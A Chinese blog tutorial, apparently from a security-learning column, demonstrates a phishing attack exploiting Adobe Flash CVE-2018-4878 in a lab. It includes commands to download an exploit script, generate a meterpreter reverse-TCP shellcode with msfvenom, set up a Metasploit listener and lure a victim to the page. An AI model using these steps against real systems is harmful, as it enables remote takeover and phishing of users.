前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Adobe Flash Player社工钓鱼

Adobe Flash Player社工钓鱼

作者头像
Al1ex
发布2021-09-07 11:28:54
8980
发布2021-09-07 11:28:54
举报
文章被收录于专栏:网络安全攻防网络安全攻防
文章前言

本篇文章主要介绍如何通过利用Adobe Flash Player的漏洞进行社工钓鱼,该漏洞目前已被修复,在实战中利用已不太奏效,仅作为学习

钓鱼实践
影响范围

Adobe Flash Player<=28.0.0.137

漏洞简介

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞,攻击者可以通过构造特殊的Flash链接,之后诱导用户用浏览器/邮件/Office访问此Flash链接,从而实现"远程代码执行",并且直接被Getshell,该漏洞于2017年底由韩国计算机应急小组(KR-CERT)首次发现

演示环境
  • 攻击主机:Kali Linux
  • 目标主机:Windows 7 sp1
  • 漏洞载荷:CVE-2018-4878.py
  • flash版本:flashplayer_activex_28.0.0.137.exe
钓鱼演示

Step 1:下载漏洞利用脚本

代码语言:javascript
复制
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

Step 2:修改载荷,将代码中的stageless变量改成"stageless = False"

Step 3:使用msf生成shellcode

代码语言:javascript
复制
msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.174.131 lport=5678  -f  python>shellcode.txt

Step 4:之替换CVE-2018-4878中的shellcode

Step 5:修改CVE-2018-4878.py下面的文件信息

Step 6:使用Python执行CVE-2018-4878.py代码,之后生成exploit.swf文件和index.html文件

Step 7:之后在Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(Apache web路径)

Step 8:Kali Linux开启Shell会话监听

代码语言:javascript
复制
msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(handler) > set lhost 192.168.174.131
msf exploit(handler) > set lport 5678 
msf exploit(handler) > exploit

Step 9:诱导用户通过IE浏览器访问页面

Step 10:Kali Linux 上获取meterpreter shell:

文末小结

从上面的演示中可以看到最终由于Flash存在CVE-2018-4878高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制,真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-08-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章前言
  • 钓鱼实践
    • 影响范围
      • 漏洞简介
        • 演示环境
          • 钓鱼演示
          • 文末小结
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档